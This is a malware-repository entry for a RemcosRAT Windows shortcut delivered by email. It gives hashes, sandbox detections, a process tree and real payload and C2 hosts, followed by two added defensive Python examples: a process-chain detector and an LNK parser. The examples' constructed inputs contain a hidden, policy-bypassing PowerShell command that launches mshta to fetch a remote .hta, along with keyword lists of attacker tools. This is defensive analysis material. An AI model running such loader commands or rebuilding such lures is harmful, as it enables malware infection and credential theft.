MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RemcosRAT


Vendor detections: 6



SHA256 hash: b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2
SHA3-384 hash: 0b89c6b620f7c815501af2cc73af398d2059a7e36ed26cd81fe4519073274e944d485fa9cb703a7c58bbe42bf0f77df4
SHA1 hash: c9d5e3dbaa2d48c6c9e8cad575e336f975ba966b
MD5 hash: 6e7c98e1220feaa449203144c761e950
humanhash: grey-crazy-ack-east
File name: Price request N°DEM23000193.lnk
Signature: RemcosRAT
File size: 2'022 bytes
First seen: 2023-07-18 06:35:26 UTC
Last seen: Never
File type: Shortcut (lnk)
MIME type: application/octet-stream
ssdeep: 12:8eUm/3BVSXvk44X3ojsqzKtnWNQC0GopW+UcCsvXIelOG5e6lzbdpYrn1IlI5u9B:8s/BHYVKVWWCDX+/CW4YO2dd79dsHmB
TLSH: T1E34189101FE50724F7B39B3568BAB7118D7B7C4AEE06CF8D015183882465624F4B9F6B
Reporter: abuse_ch
Tags: lnk RemcosRAT

Intelligence


File Origin
# of uploads: 1
# of downloads: 153
Origin country: NL
Vendor Threat Intelligence
Result
Verdict: Malicious
File Type: LNK File - Malicious
Payload URLs
URL                                    File name
http://thanhancompany.com/ta/dma.hta   LNK File
Behaviour
BlacklistAPI detected
Gathering data
Result
Verdict: MALICIOUS
Result
Threat name:
Detection: malicious
Classification: spre.troj.adwa.spyw.expl.evad
Score: 100 / 100
Signature
.NET source code contains potential unpacker
Allocates memory in foreign processes
Antivirus detection for dropped file
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to bypass UAC (CMSTPLUA)
Contains functionality to modify clipboard data
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Drops PE files to the startup folder
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Copy file to startup via Powershell
Snort IDS alert for network traffic
Suspicious command line found
Suspicious powershell command line found
Very long command line found
Windows shortcut file (LNK) starts blacklisted processes
Writes to foreign memory regions
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph (ID 1274931; sample Price_request_N#U00b0DEM230...; start date 18/07/2023; architecture WINDOWS; score 100)

Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 12 other signatures.

Process tree as reported by the sandbox (graph node numbers in brackets; "->" lists network contacts as host ip:remote-port, with the local ephemeral ports noted; signatures attached to a node in parentheses):

sample (LNK)
  - powershell.exe [12]  (Very long command line found; Suspicious command line found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file)
    - mshta.exe [17]  -> thanhancompany.com 192.185.191.127:443 (UNIFIEDLAYER-AS-1, US; local ports 49708, 49710)  (Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Very long command line found)
      - powershell.exe [25]  (Windows shortcut file (LNK) starts blacklisted processes; Very long command line found; Suspicious command line found)
        - cmd.exe [30]  (Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Very long command line found)
          - powershell.exe [35]  -> thanhancompany.com; mag.wcoomd.org 167.99.136.52:443 (DIGITALOCEAN-ASN, US; local port 49709)  drops C:\Users\user\AppData\Roaming\dmw.exe (PE32)
            - dmw.exe [43]  (Antivirus detection for dropped file; Windows shortcut file (LNK) starts blacklisted processes; Machine Learning detection for dropped file; 4 other signatures)
              - InstallUtil.exe [48]  -> favor-grace-fax.home-webserver.de 85.31.44.129:37782 (CLOUDCOMPUTING, DE (Germany); local port 49711); geoplugin.net 178.237.33.50:80 (ATOM86-ASATOM86, NL (Netherlands); local port 49712)  (Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to steal Chrome passwords or cookies; Contains functionality to modify clipboard data; 3 other signatures)
              - powershell.exe [52]  drops C:\Users\user\AppData\...\Utilsap.exe.exe (PE32)  (Drops PE files to the startup folder; Powershell drops PE file)
                - conhost.exe [57]
            - AcroRd32.exe [46]
              - RdrCEF.exe [55]  -> 192.168.2.3
          - powershell.exe [39]
          - conhost.exe [41]
        - conhost.exe [33]
    - conhost.exe [21]  -> 192.168.2.1
  - Utilsap.exe.exe [15]  (Windows shortcut file (LNK) starts blacklisted processes)
    - powershell.exe [23]
      - conhost.exe [28]
Result
Malware family: n/a
Score: 10/10
Tags: n/a
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Checks computer location settings
Blocklisted process makes network request
Malware Config
Dropper Extraction:
http://thanhancompany.com/ta/dma.hta
Please note that we are no longer able to provide a coverage score for Virus Total.
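The behaviour graph above is a chain of living-off-the-land binaries: explorer launches powershell.exe from the shortcut, which runs mshta.exe against the .hta URL, which spawns more powershell.exe and cmd.exe, which drop dmw.exe into AppData\Roaming, which in turn launches InstallUtil.exe that carries the Remcos C2 traffic. The following is an added example, not code from MalwareBazaar or the sandbox vendor, of how that chain can be recovered and flagged from Sysmon-style process-creation records. Every PID, path and command line in it is constructed to mirror the shape of the graph; the real command lines are not shown on this page, and example.invalid stands in for the real hosts.

```python
"""Added example: rebuild a process tree from constructed process-creation events and flag the
LNK -> script host -> dropped binary -> LOLBin chain seen in the behaviour graph above.
All PIDs, paths and command lines are constructed, not taken from the sandbox run."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # image file name, e.g. "powershell.exe"
    path: str      # full image path
    cmdline: str


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LOLBINS = SCRIPT_HOSTS | {"installutil.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe", "certutil.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
# hidden window, policy bypass, encoded or downloaded code; \biex\b avoids matching "iexplore"
PS_SUSPICIOUS = re.compile(
    r"-enc|-e(?:xecutionpolicy|p)\s+bypass|-w(?:indowstyle)?\s+hidden|\biex\b|"
    r"invoke-expression|downloadstring|frombase64string", re.I)
LONG_CMDLINE = 1000   # threshold in the spirit of "Very long command line found"; tune per environment


def ancestry(by_pid, pid):
    """[process, parent, grandparent, ...]; stops at unknown PIDs and on PID-reuse cycles."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def evaluate(events):
    """Return {pid: [rule names]} for every process that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for e in events:
        img, cmd, path = e.image.lower(), e.cmdline.lower(), e.path.lower()
        parent = by_pid.get(e.ppid)
        pimg = parent.image.lower() if parent else ""
        ppath = parent.path.lower() if parent else ""
        hits = []
        # A double-clicked LNK appears only as explorer.exe -> script host; there is no LNK event,
        # so judge the child's command line (length, URL, nested host) instead.
        if pimg == "explorer.exe" and img in SCRIPT_HOSTS and (
                len(e.cmdline) >= LONG_CMDLINE or "http" in cmd or "mshta" in cmd):
            hits.append("lnk_style_launch")
        if pimg in SCRIPT_HOSTS and img in SCRIPT_HOSTS:
            hits.append("script_host_spawns_script_host")
        if img in ("powershell.exe", "pwsh.exe") and PS_SUSPICIOUS.search(cmd):
            hits.append("suspicious_powershell_cmdline")
        if pimg in SCRIPT_HOSTS and any(d in path for d in USER_WRITABLE):
            hits.append("script_host_runs_binary_from_user_dir")
        # InstallUtil.exe and friends started by something living in AppData: a typical .NET
        # loader that hollows a signed Microsoft binary to host the final payload
        if img in LOLBINS - SCRIPT_HOSTS and any(d in ppath for d in USER_WRITABLE):
            hits.append("lolbin_spawned_by_dropped_binary")
        if sum(a.image.lower() in LOLBINS for a in ancestry(by_pid, e.pid)) >= 4:
            hits.append("deep_lolbin_chain")
        if hits:
            findings[e.pid] = hits
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed; mirrors the shape of the behaviour graph, not its real command lines
    ProcEvent(4, 1, "explorer.exe", r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(12, 4, "powershell.exe", PS,
              "powershell -w hidden -ep bypass -c \"mshta 'http://example.invalid/ta/dma.hta'\""),
    ProcEvent(17, 12, "mshta.exe", r"C:\Windows\System32\mshta.exe", "mshta http://example.invalid/ta/dma.hta"),
    ProcEvent(25, 17, "powershell.exe", PS,
              "powershell -ep bypass -w hidden -c \"cmd /c powershell -ep bypass -f $env:TEMP\\stage2.ps1\""),
    ProcEvent(30, 25, "cmd.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c powershell -ep bypass -f C:\Users\user\AppData\Local\Temp\stage2.ps1"),
    ProcEvent(35, 30, "powershell.exe", PS, r"powershell -ep bypass -f C:\Users\user\AppData\Local\Temp\stage2.ps1"),
    ProcEvent(43, 35, "dmw.exe", r"C:\Users\user\AppData\Roaming\dmw.exe", r"C:\Users\user\AppData\Roaming\dmw.exe"),
    ProcEvent(48, 43, "InstallUtil.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
              "InstallUtil.exe"),
    ProcEvent(900, 4, "powershell.exe", PS, "powershell.exe"),          # benign: a user opened a console
    ProcEvent(901, 900, "conhost.exe", r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4"),
]

if __name__ == "__main__":
    for pid, rules in evaluate(EVENTS).items():
        print(pid, EVENTS[[e.pid for e in EVENTS].index(pid)].image, rules)
```

Each rule on its own is noisy (administrators do launch PowerShell from Explorer); the value is that one lineage trips several of them, with the interactive console at PID 900 tripping none. The deep-chain rule counts LOLBins along the whole ancestry, so it still fires for dmw.exe even though dmw.exe itself is not in the list.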

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Download_in_LNK
Author: @bartblaze
Description: Identifies download artefacts in shortcut (LNK) files.
Rule name: EXE_in_LNK
Author: @bartblaze
Description: Identifies executable artefacts in shortcut (LNK) files.
Rule name: PS_in_LNK
Author: @bartblaze
Description: Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name: Script_in_LNK
Author: @bartblaze
Description: Identifies scripting artefacts in shortcut (LNK) files.
Rule name: SUSP_LNK_PowerShell
Author: SECUINFRA Falcon Team
Description: Detects the reference to powershell inside an lnk file, which is suspicious
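All five rules above key on strings inside the shortcut's StringData: the relative path, command-line arguments and icon location that a .lnk carries after its header. Below is an added example, not part of this MalwareBazaar page and not the rule authors' tooling, of a parser that walks the MS-SHLLINK layout (header, LinkTargetIDList, LinkInfo, StringData) and reports the same artefacts. The LNK it parses is built in memory; its PowerShell target, -w hidden / -ep bypass switches and the example.invalid URL are constructed placeholders, not the command line of this sample, which the page does not show.

```python
"""Added example: parse a Windows Shell Link (.lnk) and triage its StringData for the
artefacts the YARA rules above match on (URLs, executables, PowerShell, scripts).
The LNK bytes are constructed in memory; the target, switches and URL are placeholders."""
import re
import struct
import sys

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags (MS-SHLLINK 2.1.1), low byte; the higher bits do not change the layout walked here
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
               (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"))

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)   # stops at quotes/parens, so no trailing "')"
# Strings the rules above key on, plus the usual LOLBin downloaders and PowerShell switches
SUSPICIOUS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript", "rundll32", "regsvr32",
              "certutil", "bitsadmin", "-enc", "-ep bypass", "-executionpolicy", "hidden", "iex",
              "invoke-expression", "downloadstring", "downloadfile", ".hta", ".vbs")


def _read_u16(data, off):
    if off + 2 > len(data):
        raise ValueError("truncated LNK at offset %d" % off)
    return struct.unpack_from("<H", data, off)[0]


def parse_lnk(data: bytes) -> dict:
    """Walk header -> LinkTargetIDList -> LinkInfo -> StringData; return flags and the strings."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link: bad HeaderSize or LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:                      # IDListSize, then IDList incl. the 2-byte TerminalID
        off += 2 + _read_u16(data, off)
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        if off + 4 > len(data):
            raise ValueError("truncated LinkInfo")
        off += struct.unpack_from("<I", data, off)[0]
    out = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    for bit, name in STRING_DATA:                # CountCharacters + chars, no terminator, fixed order
        if not flags & bit:
            continue
        count = _read_u16(data, off)
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated %s" % name)
        off += count * width
        out[name] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
    return out


def triage_lnk(data: bytes) -> dict:
    """What a reviewer wants first: target, arguments, URLs, keyword hits, window state."""
    info = parse_lnk(data)
    text = " ".join(v for v in info.values() if isinstance(v, str))
    low = text.lower()
    return {
        "target": info.get("relative_path", ""),
        "arguments": info.get("arguments", ""),
        "icon_location": info.get("icon_location", ""),
        "urls": URL_RE.findall(text),
        "indicators": sorted(k for k in SUSPICIOUS if k in low),
        "minimized": info["show_command"] == 7,   # SW_SHOWMINNOACTIVE: console starts minimized
    }


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int = 7) -> bytes:
    """Assemble a minimal spec-conformant LNK (constructed test input, not a real sample)."""
    def u16str(s):
        enc = s.encode("utf-16-le")
        return struct.pack("<H", len(enc) // 2) + enc
    flags = HAS_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<HH", 6, 4) + b"\x1f\x50" + b"\x00\x00"   # one 4-byte ItemID + TerminalID
    strings = u16str(relative_path) + u16str(arguments) + u16str(icon_location)
    return header + id_list + strings + b"\x00\x00\x00\x00"          # TerminalBlock ends ExtraData


# Constructed inputs: a PowerShell lure shaped like the page's LNK (hidden window, policy bypass,
# mshta fetching an .hta from a placeholder host) and a plain document shortcut for contrast.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"mshta 'http://example.invalid/ta/dma.hta'\"",
    r"%SystemRoot%\System32\shell32.dll",
)
BENIGN_LNK = build_lnk(r"..\..\Documents\notes.txt", "", r"%SystemRoot%\System32\shell32.dll", show_command=1)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    for k, v in triage_lnk(data).items():
        print(f"{k:>14}: {v}")
```

Run it with a path argument to triage a real file. Two details matter in practice: the URL regex excludes quotes and parentheses precisely so that a URL quoted inside a function call comes out clean, and ShowCommand 7 (minimized, not activated) together with a harmless icon path is the usual way a malicious shortcut hides its console window while looking like a document.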

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam
RemcosRAT
Shortcut (lnk) b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2 (this sample)

Delivery method: Distributed via e-mail attachment
